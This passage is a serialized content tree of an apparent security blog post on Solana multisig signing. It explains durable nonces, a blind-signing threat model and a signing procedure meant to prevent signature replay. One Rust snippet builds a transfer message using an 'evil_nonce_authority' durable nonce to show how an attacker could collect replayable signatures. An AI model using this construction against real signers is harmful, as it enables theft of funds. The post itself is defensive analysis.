error_counters",{"type":26,"tag":137,"props":71027,"children":71028},{"style":5590},[71029],{"type":32,"value":470},{"type":26,"tag":137,"props":71031,"children":71032},{"style":5601},[71033],{"type":32,"value":71034},"blockhash_not_found ",{"type":26,"tag":137,"props":71036,"children":71037},{"style":5590},[71038],{"type":32,"value":71039},"+=",{"type":26,"tag":137,"props":71041,"children":71042},{"style":5626},[71043],{"type":32,"value":7104},{"type":26,"tag":137,"props":71045,"children":71046},{"style":5601},[71047],{"type":32,"value":5604},{"type":26,"tag":137,"props":71049,"children":71050},{"class":5559,"line":6355},[71051,71055,71059,71064,71068,71073],{"type":26,"tag":137,"props":71052,"children":71053},{"style":6009},[71054],{"type":32,"value":17446},{"type":26,"tag":137,"props":71056,"children":71057},{"style":5601},[71058],{"type":32,"value":165},{"type":26,"tag":137,"props":71060,"children":71061},{"style":6009},[71062],{"type":32,"value":71063},"TransactionError",{"type":26,"tag":137,"props":71065,"children":71066},{"style":5590},[71067],{"type":32,"value":6072},{"type":26,"tag":137,"props":71069,"children":71070},{"style":6009},[71071],{"type":32,"value":71072},"BlockhashNotFound",{"type":26,"tag":137,"props":71074,"children":71075},{"style":5601},[71076],{"type":32,"value":5742},{"type":26,"tag":137,"props":71078,"children":71079},{"class":5559,"line":6363},[71080],{"type":26,"tag":137,"props":71081,"children":71082},{"style":5601},[71083],{"type":32,"value":5945},{"type":26,"tag":35,"props":71085,"children":71086},{},[71087],{"type":32,"value":71088},"The documentation does a good job of explaining how they work.",{"type":26,"tag":5503,"props":71090,"children":71091},{},[71092],{"type":26,"tag":35,"props":71093,"children":71094},{},[71095],{"type":32,"value":71096},"Durable Transaction Nonces, which are 32-byte in length (usually represented as base58 encoded strings), are used in place of recent blockhashes to make every transaction unique (to avoid double-spending) while removing the mortality on the unexecuted transaction.",{"type":26,"tag":35,"props":71098,"children":71099},{},[71100,71102,71109],{"type":32,"value":71101},"Durable nonces are created and managed ",{"type":26,"tag":41,"props":71103,"children":71106},{"href":71104,"rel":71105},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/programs/system/src/system_processor.rs#L446",[45],[71107],{"type":32,"value":71108},"by the system program",{"type":32,"value":71110},". They don't have a fixed PDA, so each account can have multiple associated nonces.",{"type":26,"tag":35,"props":71112,"children":71113},{},[71114,71116,71123],{"type":32,"value":71115},"After a durable nonce is used, it'll be \"advanced\" to preventing replay attacks. The new nonce is calculated ",{"type":26,"tag":41,"props":71117,"children":71120},{"href":71118,"rel":71119},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L81",[45],[71121],{"type":32,"value":71122},"based on the current blockhash",{"type":32,"value":71124},", and cannot be predicted in advance.",{"type":26,"tag":5512,"props":71126,"children":71128},{"className":5552,"code":71127,"language":5551,"meta":7,"style":7},"    let hash_queue = self.blockhash_queue.read().unwrap();\n    let last_blockhash = hash_queue.last_hash();\n    let next_durable_nonce = DurableNonce::from_blockhash(&last_blockhash);\n",[71129],{"type":26,"tag":130,"props":71130,"children":71131},{"__ignoreMap":7},[71132,71184,71217],{"type":26,"tag":137,"props":71133,"children":71134},{"class":5559,"line":5560},[71135,71139,71143,71147,71151,71155,71160,71164,71168,71172,71176,71180],{"type":26,"tag":137,"props":71136,"children":71137},{"style":5573},[71138],{"type":32,"value":5576},{"type":26,"tag":137,"props":71140,"children":71141},{"style":5584},[71142],{"type":32,"value":70692},{"type":26,"tag":137,"props":71144,"children":71145},{"style":5590},[71146],{"type":32,"value":5593},{"type":26,"tag":137,"props":71148,"children":71149},{"style":5573},[71150],{"type":32,"value":16388},{"type":26,"tag":137,"props":71152,"children":71153},{"style":5590},[71154],{"type":32,"value":470},{"type":26,"tag":137,"props":71156,"children":71157},{"style":5601},[71158],{"type":32,"value":71159},"blockhash_queue",{"type":26,"tag":137,"props":71161,"children":71162},{"style":5590},[71163],{"type":32,"value":470},{"type":26,"tag":137,"props":71165,"children":71166},{"style":5682},[71167],{"type":32,"value":63242},{"type":26,"tag":137,"props":71169,"children":71170},{"style":5601},[71171],{"type":32,"value":16470},{"type":26,"tag":137,"props":71173,"children":71174},{"style":5590},[71175],{"type":32,"value":470},{"type":26,"tag":137,"props":71177,"children":71178},{"style":5682},[71179],{"type":32,"value":6262},{"type":26,"tag":137,"props":71181,"children":71182},{"style":5601},[71183],{"type":32,"value":6267},{"type":26,"tag":137,"props":71185,"children":71186},{"class":5559,"line":5412},[71187,71191,71196,71200,71204,71208,71213],{"type":26,"tag":137,"props":71188,"children":71189},{"style":5573},[71190],{"type":32,"value":5576},{"type":26,"tag":137,"props":71192,"children":71193},{"style":5584},[71194],{"type":32,"value":71195}," last_blockhash",{"type":26,"tag":137,"props":71197,"children":71198},{"style":5590},[71199],{"type":32,"value":5593},{"type":26,"tag":137,"props":71201,"children":71202},{"style":5584},[71203],{"type":32,"value":70692},{"type":26,"tag":137,"props":71205,"children":71206},{"style":5590},[71207],{"type":32,"value":470},{"type":26,"tag":137,"props":71209,"children":71210},{"style":5682},[71211],{"type":32,"value":71212},"last_hash",{"type":26,"tag":137,"props":71214,"children":71215},{"style":5601},[71216],{"type":32,"value":6267},{"type":26,"tag":137,"props":71218,"children":71219},{"class":5559,"line":5417},[71220,71224,71229,71233,71238,71242,71247,71251,71255,71260],{"type":26,"tag":137,"props":71221,"children":71222},{"style":5573},[71223],{"type":32,"value":5576},{"type":26,"tag":137,"props":71225,"children":71226},{"style":5584},[71227],{"type":32,"value":71228}," next_durable_nonce",{"type":26,"tag":137,"props":71230,"children":71231},{"style":5590},[71232],{"type":32,"value":5593},{"type":26,"tag":137,"props":71234,"children":71235},{"style":6009},[71236],{"type":32,"value":71237}," DurableNonce",{"type":26,"tag":137,"props":71239,"children":71240},{"style":5590},[71241],{"type":32,"value":6072},{"type":26,"tag":137,"props":71243,"children":71244},{"style":5682},[71245],{"type":32,"value":71246},"from_blockhash",{"type":26,"tag":137,"props":71248,"children":71249},{"style":5601},[71250],{"type":32,"value":165},{"type":26,"tag":137,"props":71252,"children":71253},{"style":5590},[71254],{"type":32,"value":5694},{"type":26,"tag":137,"props":71256,"children":71257},{"style":5584},[71258],{"type":32,"value":71259},"last_blockhash",{"type":26,"tag":137,"props":71261,"children":71262},{"style":5601},[71263],{"type":32,"value":6430},{"type":26,"tag":35,"props":71265,"children":71266},{},[71267,71269,71274],{"type":32,"value":71268},"This has an important consequence for our threat model. Unlike recent blockhash transactions, durable nonce transactions ",{"type":26,"tag":762,"props":71270,"children":71271},{},[71272],{"type":32,"value":71273},"can",{"type":32,"value":71275}," be saved and reused.",{"type":26,"tag":92,"props":71277,"children":71279},{"id":71278},"threat-model",[71280],{"type":32,"value":71281},"Threat Model",{"type":26,"tag":35,"props":71283,"children":71284},{},[71285],{"type":32,"value":71286},"Let's consider a simplified form of the original question.",{"type":26,"tag":4820,"props":71288,"children":71289},{},[71290,71295,71300],{"type":26,"tag":3430,"props":71291,"children":71292},{},[71293],{"type":32,"value":71294},"We have a N/M multisig",{"type":26,"tag":3430,"props":71296,"children":71297},{},[71298],{"type":32,"value":71299},"Signers are unable to see what they're signing, both with respect to content and quantity of signatures. This is roughly equivalent to blind signing transactions.",{"type":26,"tag":3430,"props":71301,"children":71302},{},[71303],{"type":32,"value":71304},"We can accurately query chain state.",{"type":26,"tag":35,"props":71306,"children":71307},{},[71308],{"type":32,"value":71309},"Can we safely sign transactions?",{"type":26,"tag":35,"props":71311,"children":71312},{},[71313],{"type":32,"value":71314},"One observation is that this problem is very hard to solve with durable nonces. By signing durable nonce transactions, an attacker could collect signatures and replay them at some indeterminite future point.",{"type":26,"tag":35,"props":71316,"children":71317},{},[71318,71320,71326,71328,71335],{"type":32,"value":71319},"Durable nonces require an onchain account, and it's possible to use a ",{"type":26,"tag":130,"props":71321,"children":71323},{"className":71322},[],[71324],{"type":32,"value":71325},"getProgramAccounts",{"type":32,"value":71327}," call to validate if your signer ",{"type":26,"tag":41,"props":71329,"children":71332},{"href":71330,"rel":71331},"https://solana.stackexchange.com/questions/9650/is-there-any-way-to-get-nonce-accounts-of-an-authorized-account",[45],[71333],{"type":32,"value":71334},"has an associated durable nonce",{"type":32,"value":470},{"type":26,"tag":5512,"props":71337,"children":71339},{"className":38526,"code":71338,"language":38528,"meta":7,"style":7},"const connection = new Connection(clusterApiUrl('testnet'));\nconst nonceAccounts = await connection.getProgramAccounts(\n  // The system program owns all nonce accounts.\n  SYSTEM_PROGRAM_ADDRESS,\n  {\n    filters: [\n      {\n        // Nonce accounts are exactly 80 bytes long\n        dataSize: 80,\n      },\n      {\n        // The authority's 32-byte public key is written\n        // into bytes 8-40 of the nonce's account data.\n        memcmp: {\n          bytes: AUTHORITY_PUBLIC_KEY.toBase58(),\n          offset: 8,\n        },\n      },\n    ],\n  }\n);\n",[71340],{"type":26,"tag":130,"props":71341,"children":71342},{"__ignoreMap":7},[71343,71390,71426,71434,71446,71454,71466,71474,71482,71499,71506,71513,71521,71529,71541,71567,71584,71591,71598,71606,71613],{"type":26,"tag":137,"props":71344,"children":71345},{"class":5559,"line":5560},[71346,71350,71355,71359,71363,71368,71372,71377,71381,71386],{"type":26,"tag":137,"props":71347,"children":71348},{"style":5573},[71349],{"type":32,"value":12244},{"type":26,"tag":137,"props":71351,"children":71352},{"style":5584},[71353],{"type":32,"value":71354}," connection",{"type":26,"tag":137,"props":71356,"children":71357},{"style":5590},[71358],{"type":32,"value":5593},{"type":26,"tag":137,"props":71360,"children":71361},{"style":5573},[71362],{"type":32,"value":34528},{"type":26,"tag":137,"props":71364,"children":71365},{"style":5682},[71366],{"type":32,"value":71367}," Connection",{"type":26,"tag":137,"props":71369,"children":71370},{"style":5601},[71371],{"type":32,"value":165},{"type":26,"tag":137,"props":71373,"children":71374},{"style":5682},[71375],{"type":32,"value":71376},"clusterApiUrl",{"type":26,"tag":137,"props":71378,"children":71379},{"style":5601},[71380],{"type":32,"value":165},{"type":26,"tag":137,"props":71382,"children":71383},{"style":6837},[71384],{"type":32,"value":71385},"'testnet'",{"type":26,"tag":137,"props":71387,"children":71388},{"style":5601},[71389],{"type":32,"value":9807},{"type":26,"tag":137,"props":71391,"children":71392},{"class":5559,"line":5412},[71393,71397,71402,71406,71410,71414,71418,71422],{"type":26,"tag":137,"props":71394,"children":71395},{"style":5573},[71396],{"type":32,"value":12244},{"type":26,"tag":137,"props":71398,"children":71399},{"style":5584},[71400],{"type":32,"value":71401}," nonceAccounts",{"type":26,"tag":137,"props":71403,"children":71404},{"style":5590},[71405],{"type":32,"value":5593},{"type":26,"tag":137,"props":71407,"children":71408},{"style":5610},[71409],{"type":32,"value":38807},{"type":26,"tag":137,"props":71411,"children":71412},{"style":5584},[71413],{"type":32,"value":71354},{"type":26,"tag":137,"props":71415,"children":71416},{"style":5601},[71417],{"type":32,"value":470},{"type":26,"tag":137,"props":71419,"children":71420},{"style":5682},[71421],{"type":32,"value":71325},{"type":26,"tag":137,"props":71423,"children":71424},{"style":5601},[71425],{"type":32,"value":6054},{"type":26,"tag":137,"props":71427,"children":71428},{"class":5559,"line":5417},[71429],{"type":26,"tag":137,"props":71430,"children":71431},{"style":5564},[71432],{"type":32,"value":71433},"  // The system program owns all nonce accounts.\n",{"type":26,"tag":137,"props":71435,"children":71436},{"class":5559,"line":5642},[71437,71442],{"type":26,"tag":137,"props":71438,"children":71439},{"style":5584},[71440],{"type":32,"value":71441},"  SYSTEM_PROGRAM_ADDRESS",{"type":26,"tag":137,"props":71443,"children":71444},{"style":5601},[71445],{"type":32,"value":6099},{"type":26,"tag":137,"props":71447,"children":71448},{"class":5559,"line":5745},[71449],{"type":26,"tag":137,"props":71450,"children":71451},{"style":5601},[71452],{"type":32,"value":71453},"  {\n",{"type":26,"tag":137,"props":71455,"children":71456},{"class":5559,"line":5850},[71457,71462],{"type":26,"tag":137,"props":71458,"children":71459},{"style":5584},[71460],{"type":32,"value":71461},"    filters:",{"type":26,"tag":137,"props":71463,"children":71464},{"style":5601},[71465],{"type":32,"value":28213},{"type":26,"tag":137,"props":71467,"children":71468},{"class":5559,"line":5878},[71469],{"type":26,"tag":137,"props":71470,"children":71471},{"style":5601},[71472],{"type":32,"value":71473},"      {\n",{"type":26,"tag":137,"props":71475,"children":71476},{"class":5559,"line":5891},[71477],{"type":26,"tag":137,"props":71478,"children":71479},{"style":5564},[71480],{"type":32,"value":71481},"        // Nonce accounts are exactly 80 bytes long\n",{"type":26,"tag":137,"props":71483,"children":71484},{"class":5559,"line":5909},[71485,71490,71495],{"type":26,"tag":137,"props":71486,"children":71487},{"style":5584},[71488],{"type":32,"value":71489},"        dataSize:",{"type":26,"tag":137,"props":71491,"children":71492},{"style":5626},[71493],{"type":32,"value":71494}," 80",{"type":26,"tag":137,"props":71496,"children":71497},{"style":5601},[71498],{"type":32,"value":6099},{"type":26,"tag":137,"props":71500,"children":71501},{"class":5559,"line":5930},[71502],{"type":26,"tag":137,"props":71503,"children":71504},{"style":5601},[71505],{"type":32,"value":39795},{"type":26,"tag":137,"props":71507,"children":71508},{"class":5559,"line":5939},[71509],{"type":26,"tag":137,"props":71510,"children":71511},{"style":5601},[71512],{"type":32,"value":71473},{"type":26,"tag":137,"props":71514,"children":71515},{"class":5559,"line":6191},[71516],{"type":26,"tag":137,"props":71517,"children":71518},{"style":5564},[71519],{"type":32,"value":71520},"        // The authority's 32-byte public key is written\n",{"type":26,"tag":137,"props":71522,"children":71523},{"class":5559,"line":6208},[71524],{"type":26,"tag":137,"props":71525,"children":71526},{"style":5564},[71527],{"type":32,"value":71528},"        // into bytes 8-40 of the nonce's account data.\n",{"type":26,"tag":137,"props":71530,"children":71531},{"class":5559,"line":6225},[71532,71537],{"type":26,"tag":137,"props":71533,"children":71534},{"style":5584},[71535],{"type":32,"value":71536},"        memcmp:",{"type":26,"tag":137,"props":71538,"children":71539},{"style":5601},[71540],{"type":32,"value":5875},{"type":26,"tag":137,"props":71542,"children":71543},{"class":5559,"line":6238},[71544,71549,71554,71558,71563],{"type":26,"tag":137,"props":71545,"children":71546},{"style":5584},[71547],{"type":32,"value":71548},"          bytes:",{"type":26,"tag":137,"props":71550,"children":71551},{"style":5584},[71552],{"type":32,"value":71553}," AUTHORITY_PUBLIC_KEY",{"type":26,"tag":137,"props":71555,"children":71556},{"style":5601},[71557],{"type":32,"value":470},{"type":26,"tag":137,"props":71559,"children":71560},{"style":5682},[71561],{"type":32,"value":71562},"toBase58",{"type":26,"tag":137,"props":71564,"children":71565},{"style":5601},[71566],{"type":32,"value":6082},{"type":26,"tag":137,"props":71568,"children":71569},{"class":5559,"line":6247},[71570,71575,71580],{"type":26,"tag":137,"props":71571,"children":71572},{"style":5584},[71573],{"type":32,"value":71574},"          offset:",{"type":26,"tag":137,"props":71576,"children":71577},{"style":5626},[71578],{"type":32,"value":71579}," 8",{"type":26,"tag":137,"props":71581,"children":71582},{"style":5601},[71583],{"type":32,"value":6099},{"type":26,"tag":137,"props":71585,"children":71586},{"class":5559,"line":6270},[71587],{"type":26,"tag":137,"props":71588,"children":71589},{"style":5601},[71590],{"type":32,"value":27965},{"type":26,"tag":137,"props":71592,"children":71593},{"class":5559,"line":6279},[71594],{"type":26,"tag":137,"props":71595,"children":71596},{"style":5601},[71597],{"type":32,"value":39795},{"type":26,"tag":137,"props":71599,"children":71600},{"class":5559,"line":6288},[71601],{"type":26,"tag":137,"props":71602,"children":71603},{"style":5601},[71604],{"type":32,"value":71605},"    ],\n",{"type":26,"tag":137,"props":71607,"children":71608},{"class":5559,"line":6355},[71609],{"type":26,"tag":137,"props":71610,"children":71611},{"style":5601},[71612],{"type":32,"value":8457},{"type":26,"tag":137,"props":71614,"children":71615},{"class":5559,"line":6363},[71616],{"type":26,"tag":137,"props":71617,"children":71618},{"style":5601},[71619],{"type":32,"value":6430},{"type":26,"tag":35,"props":71621,"children":71622},{},[71623,71625,71633],{"type":32,"value":71624},"Unfortunately this is not sufficient",{"type":26,"tag":18065,"props":71626,"children":71627},{},[71628],{"type":26,"tag":41,"props":71629,"children":71631},{"href":32217,"ariaDescribedBy":71630,"dataFootnoteRef":7,"id":32219},[18072],[71632],{"type":32,"value":878},{"type":32,"value":71634},". A transaction may have multiple signers, and an attacker could use their own durable nonce fee-payer. This means our problem as defined above is unfortunately unsolvable.",{"type":26,"tag":5512,"props":71636,"children":71638},{"className":5552,"code":71637,"language":5551,"meta":7,"style":7},"    let instruction = system_instruction::transfer(&from, &ledger_base_pubkey, 42);\n    let message =\n        Message::new_with_nonce(vec![instruction], Some(&evil_nonce_authority), &nonce_account, &evil_nonce_authority)\n            .serialize();\n",[71639],{"type":26,"tag":130,"props":71640,"children":71641},{"__ignoreMap":7},[71642,71708,71724,71807],{"type":26,"tag":137,"props":71643,"children":71644},{"class":5559,"line":5560},[71645,71649,71653,71657,71662,71666,71670,71674,71678,71682,71686,71690,71695,71699,71704],{"type":26,"tag":137,"props":71646,"children":71647},{"style":5573},[71648],{"type":32,"value":5576},{"type":26,"tag":137,"props":71650,"children":71651},{"style":5584},[71652],{"type":32,"value":45969},{"type":26,"tag":137,"props":71654,"children":71655},{"style":5590},[71656],{"type":32,"value":5593},{"type":26,"tag":137,"props":71658,"children":71659},{"style":5601},[71660],{"type":32,"value":71661}," system_instruction",{"type":26,"tag":137,"props":71663,"children":71664},{"style":5590},[71665],{"type":32,"value":6072},{"type":26,"tag":137,"props":71667,"children":71668},{"style":5682},[71669],{"type":32,"value":34718},{"type":26,"tag":137,"props":71671,"children":71672},{"style":5601},[71673],{"type":32,"value":165},{"type":26,"tag":137,"props":71675,"children":71676},{"style":5590},[71677],{"type":32,"value":5694},{"type":26,"tag":137,"props":71679,"children":71680},{"style":5584},[71681],{"type":32,"value":22066},{"type":26,"tag":137,"props":71683,"children":71684},{"style":5601},[71685],{"type":32,"value":1108},{"type":26,"tag":137,"props":71687,"children":71688},{"style":5590},[71689],{"type":32,"value":5694},{"type":26,"tag":137,"props":71691,"children":71692},{"style":5584},[71693],{"type":32,"value":71694},"ledger_base_pubkey",{"type":26,"tag":137,"props":71696,"children":71697},{"style":5601},[71698],{"type":32,"value":1108},{"type":26,"tag":137,"props":71700,"children":71701},{"style":5626},[71702],{"type":32,"value":71703},"42",{"type":26,"tag":137,"props":71705,"children":71706},{"style":5601},[71707],{"type":32,"value":6430},{"type":26,"tag":137,"props":71709,"children":71710},{"class":5559,"line":5412},[71711,71715,71720],{"type":26,"tag":137,"props":71712,"children":71713},{"style":5573},[71714],{"type":32,"value":5576},{"type":26,"tag":137,"props":71716,"children":71717},{"style":5584},[71718],{"type":32,"value":71719}," message",{"type":26,"tag":137,"props":71721,"children":71722},{"style":5590},[71723],{"type":32,"value":38451},{"type":26,"tag":137,"props":71725,"children":71726},{"class":5559,"line":5417},[71727,71732,71736,71741,71745,71749,71753,71757,71761,71765,71769,71773,71778,71782,71786,71791,71795,71799,71803],{"type":26,"tag":137,"props":71728,"children":71729},{"style":6009},[71730],{"type":32,"value":71731},"        Message",{"type":26,"tag":137,"props":71733,"children":71734},{"style":5590},[71735],{"type":32,"value":6072},{"type":26,"tag":137,"props":71737,"children":71738},{"style":5682},[71739],{"type":32,"value":71740},"new_with_nonce",{"type":26,"tag":137,"props":71742,"children":71743},{"style":5601},[71744],{"type":32,"value":165},{"type":26,"tag":137,"props":71746,"children":71747},{"style":5682},[71748],{"type":32,"value":6482},{"type":26,"tag":137,"props":71750,"children":71751},{"style":5601},[71752],{"type":32,"value":3016},{"type":26,"tag":137,"props":71754,"children":71755},{"style":5584},[71756],{"type":32,"value":46279},{"type":26,"tag":137,"props":71758,"children":71759},{"style":5601},[71760],{"type":32,"value":25640},{"type":26,"tag":137,"props":71762,"children":71763},{"style":6009},[71764],{"type":32,"value":44618},{"type":26,"tag":137,"props":71766,"children":71767},{"style":5601},[71768],{"type":32,"value":165},{"type":26,"tag":137,"props":71770,"children":71771},{"style":5590},[71772],{"type":32,"value":5694},{"type":26,"tag":137,"props":71774,"children":71775},{"style":5584},[71776],{"type":32,"value":71777},"evil_nonce_authority",{"type":26,"tag":137,"props":71779,"children":71780},{"style":5601},[71781],{"type":32,"value":17769},{"type":26,"tag":137,"props":71783,"children":71784},{"style":5590},[71785],{"type":32,"value":5694},{"type":26,"tag":137,"props":71787,"children":71788},{"style":5584},[71789],{"type":32,"value":71790},"nonce_account",{"type":26,"tag":137,"props":71792,"children":71793},{"style":5601},[71794],{"type":32,"value":1108},{"type":26,"tag":137,"props":71796,"children":71797},{"style":5590},[71798],{"type":32,"value":5694},{"type":26,"tag":137,"props":71800,"children":71801},{"style":5584},[71802],{"type":32,"value":71777},{"type":26,"tag":137,"props":71804,"children":71805},{"style":5601},[71806],{"type":32,"value":5742},{"type":26,"tag":137,"props":71808,"children":71809},{"class":5559,"line":5642},[71810,71814,71819],{"type":26,"tag":137,"props":71811,"children":71812},{"style":5590},[71813],{"type":32,"value":5751},{"type":26,"tag":137,"props":71815,"children":71816},{"style":5682},[71817],{"type":32,"value":71818},"serialize",{"type":26,"tag":137,"props":71820,"children":71821},{"style":5601},[71822],{"type":32,"value":6267},{"type":26,"tag":35,"props":71824,"children":71825},{},[71826,71828,71835],{"type":32,"value":71827},"Luckily, it is tractable with a small modification. What if the signer is allowed to observe the fee-payer on the transaction? For example, Ledger ",{"type":26,"tag":41,"props":71829,"children":71832},{"href":71830,"rel":71831},"https://github.com/LedgerHQ/app-solana/blob/a19da6c301541390bd08731a10f1f128b38ee66e/src/handle_sign_message.c#L97",[45],[71833],{"type":32,"value":71834},"logs the fee-payer here",{"type":32,"value":470},{"type":26,"tag":5512,"props":71837,"children":71839},{"className":19107,"code":71838,"language":4326,"meta":7,"style":7},"bool print_config_show_authority(const PrintConfig* print_config, const Pubkey* authority) {\n    return print_config->expert_mode || !pubkeys_equal(print_config->signer_pubkey, authority);\n}\n",[71840],{"type":26,"tag":130,"props":71841,"children":71842},{"__ignoreMap":7},[71843,71902,71958],{"type":26,"tag":137,"props":71844,"children":71845},{"class":5559,"line":5560},[71846,71850,71855,71859,71863,71868,71872,71877,71881,71885,71889,71893,71898],{"type":26,"tag":137,"props":71847,"children":71848},{"style":5573},[71849],{"type":32,"value":32279},{"type":26,"tag":137,"props":71851,"children":71852},{"style":5682},[71853],{"type":32,"value":71854}," print_config_show_authority",{"type":26,"tag":137,"props":71856,"children":71857},{"style":5601},[71858],{"type":32,"value":165},{"type":26,"tag":137,"props":71860,"children":71861},{"style":5573},[71862],{"type":32,"value":12244},{"type":26,"tag":137,"props":71864,"children":71865},{"style":5601},[71866],{"type":32,"value":71867}," PrintConfig",{"type":26,"tag":137,"props":71869,"children":71870},{"style":5590},[71871],{"type":32,"value":7152},{"type":26,"tag":137,"props":71873,"children":71874},{"style":5584},[71875],{"type":32,"value":71876}," print_config",{"type":26,"tag":137,"props":71878,"children":71879},{"style":5601},[71880],{"type":32,"value":1108},{"type":26,"tag":137,"props":71882,"children":71883},{"style":5573},[71884],{"type":32,"value":12244},{"type":26,"tag":137,"props":71886,"children":71887},{"style":5601},[71888],{"type":32,"value":23450},{"type":26,"tag":137,"props":71890,"children":71891},{"style":5590},[71892],{"type":32,"value":7152},{"type":26,"tag":137,"props":71894,"children":71895},{"style":5584},[71896],{"type":32,"value":71897}," authority",{"type":26,"tag":137,"props":71899,"children":71900},{"style":5601},[71901],{"type":32,"value":17395},{"type":26,"tag":137,"props":71903,"children":71904},{"class":5559,"line":5412},[71905,71909,71913,71917,71922,71926,71930,71935,71939,71944,71948,71953],{"type":26,"tag":137,"props":71906,"children":71907},{"style":5610},[71908],{"type":32,"value":19582},{"type":26,"tag":137,"props":71910,"children":71911},{"style":5584},[71912],{"type":32,"value":71876},{"type":26,"tag":137,"props":71914,"children":71915},{"style":5601},[71916],{"type":32,"value":16348},{"type":26,"tag":137,"props":71918,"children":71919},{"style":5584},[71920],{"type":32,"value":71921},"expert_mode",{"type":26,"tag":137,"props":71923,"children":71924},{"style":5590},[71925],{"type":32,"value":26288},{"type":26,"tag":137,"props":71927,"children":71928},{"style":5590},[71929],{"type":32,"value":15455},{"type":26,"tag":137,"props":71931,"children":71932},{"style":5682},[71933],{"type":32,"value":71934},"pubkeys_equal",{"type":26,"tag":137,"props":71936,"children":71937},{"style":5601},[71938],{"type":32,"value":165},{"type":26,"tag":137,"props":71940,"children":71941},{"style":5584},[71942],{"type":32,"value":71943},"print_config",{"type":26,"tag":137,"props":71945,"children":71946},{"style":5601},[71947],{"type":32,"value":16348},{"type":26,"tag":137,"props":71949,"children":71950},{"style":5584},[71951],{"type":32,"value":71952},"signer_pubkey",{"type":26,"tag":137,"props":71954,"children":71955},{"style":5601},[71956],{"type":32,"value":71957},", authority);\n",{"type":26,"tag":137,"props":71959,"children":71960},{"class":5559,"line":5417},[71961],{"type":26,"tag":137,"props":71962,"children":71963},{"style":5601},[71964],{"type":32,"value":6507},{"type":26,"tag":35,"props":71966,"children":71967},{},[71968],{"type":32,"value":71969},"Let's say we've determined our signer has no associated nonce accounts. If our pubkey is the fee-payer on the new proposed transaction, we can know for sure that the transaction does not use durable nonces!",{"type":26,"tag":35,"props":71971,"children":71972},{},[71973],{"type":32,"value":71974},"Without durable nonces, the problem becomes much easier to solve. After waiting enough time, there'll be a point where all previously signed transactions will be expired. If we see no unexpected transactions, that means we're safe.",{"type":26,"tag":35,"props":71976,"children":71977},{},[71978],{"type":32,"value":71979},"We can then use the following procedure.",{"type":26,"tag":4820,"props":71981,"children":71982},{},[71983,71988,71993,71998,72003],{"type":26,"tag":3430,"props":71984,"children":71985},{},[71986],{"type":32,"value":71987},"Ensure all signers have no durable nonce accounts.",{"type":26,"tag":3430,"props":71989,"children":71990},{},[71991],{"type":32,"value":71992},"The first signer signs and submits the transaction.",{"type":26,"tag":3430,"props":71994,"children":71995},{},[71996],{"type":32,"value":71997},"Wait two minutes for all recent blockhashes to expire.",{"type":26,"tag":3430,"props":71999,"children":72000},{},[72001],{"type":32,"value":72002},"Observe recent transactions associated with the signer to ensure nothing unexpected is submitted.",{"type":26,"tag":3430,"props":72004,"children":72005},{},[72006],{"type":32,"value":72007},"Repeat steps 2 to 4 for each signer",{"type":26,"tag":92,"props":72009,"children":72011},{"id":72010},"beyond",[72012],{"type":32,"value":72013},"Beyond",{"type":26,"tag":35,"props":72015,"children":72016},{},[72017],{"type":32,"value":72018},"Solana's signature model is unique. What can protocols do if they're deploying on blockchains without these unique properties? The most important constraint is observability. There must be a way you can see what you're signing, either while signing or implicitly after the fact.",{"type":26,"tag":35,"props":72020,"children":72021},{},[72022,72024,72031],{"type":32,"value":72023},"For example, pcaversaccio wrote a tool to ",{"type":26,"tag":41,"props":72025,"children":72028},{"href":72026,"rel":72027},"https://github.com/pcaversaccio/safe-tx-hashes-util",[45],[72029],{"type":32,"value":72030},"validate Safe transaction hashes",{"type":32,"value":72032},". As the space matures, we hope more open source tooling will come to light.",{"type":26,"tag":21015,"props":72034,"children":72036},{"className":72035,"dataFootnotes":7},[21018],[72037,72042],{"type":26,"tag":92,"props":72038,"children":72040},{"className":72039,"id":18072},[21023],[72041],{"type":32,"value":21026},{"type":26,"tag":4820,"props":72043,"children":72044},{},[72045],{"type":26,"tag":3430,"props":72046,"children":72047},{"id":32960},[72048,72050,72058,72060],{"type":32,"value":72049},"The original version of this blog post did not consider a malicious fee-payer. Thanks to ",{"type":26,"tag":41,"props":72051,"children":72055},{"href":72052,"rel":72053,":style":72054},"https://twitter.com/PierreArowana",[45],"color: #B1D0EE; text-decoration: underline;",[72056],{"type":32,"value":72057},"@PierreArowana",{"type":32,"value":72059}," for pointing this out to me. ",{"type":26,"tag":41,"props":72061,"children":72063},{"href":32988,"ariaLabel":21128,"className":72062,"dataFootnoteBackref":7},[21130],[72064],{"type":32,"value":21133},{"type":26,"tag":7949,"props":72066,"children":72067},{},[72068],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":72070},[72071,72075,72076,72077],{"id":70267,"depth":5412,"text":70270,"children":72072},[72073,72074],{"id":70278,"depth":5417,"text":70281},{"id":70557,"depth":5417,"text":70560},{"id":71278,"depth":5412,"text":71281},{"id":72010,"depth":5412,"text":72013},{"id":18072,"depth":5412,"text":21026},"content:blog:2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security",{"_path":72082,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":72083,"description":72084,"date":72085,"author":72086,"image":72087,"isFeatured":18,"onBlogPage":18,"tags":72089,"body":72090,"_type":5433,"_id":73787,"_source":5435,"_file":73788,"_stem":73789,"_extension":5438},"/blog/2025-03-07-subverting-web2-authentication-in-web3","Subverting Web2 Authentication in Web3","Web3 authentication uses cryptographic signatures and wallets, but Web2 auth integrations can introduce hidden risks. We explore vulnerabilities like OAuth logic exploits, Supabase misconfigurations, and OAuth abuse in localhost setups.","2025-03-07",[33796,33795],{"src":72088},"/posts/web2-in-web3/title.jpg",[34736],{"type":23,"children":72091,"toc":73769},[72092,72097,72102,72107,72133,72139,72144,72150,72171,72177,72182,72189,72202,72232,72238,72282,72289,72295,72328,72349,72357,72376,72383,72388,72394,72399,72404,72429,72434,72440,72446,72467,72473,72500,72528,72535,72540,72545,72890,72894,72916,72922,72943,72957,72970,72975,72991,72996,73724,73729,73734,73739,73751,73755,73760,73765],{"type":26,"tag":35,"props":72093,"children":72094},{},[72095],{"type":32,"value":72096},"Authentication serves as a cornerstone of secure interactions in Web3, enabling access control, user identity verification, and transaction integrity. Unlike traditional Web2 systems, which often rely on centralized databases and password-based mechanisms, Web3 systems adopt decentralized identifiers (DIDs), cryptographic signatures, and wallet-based authentication. However, there are many applications that still use Web2-based authentication providers to improve the user 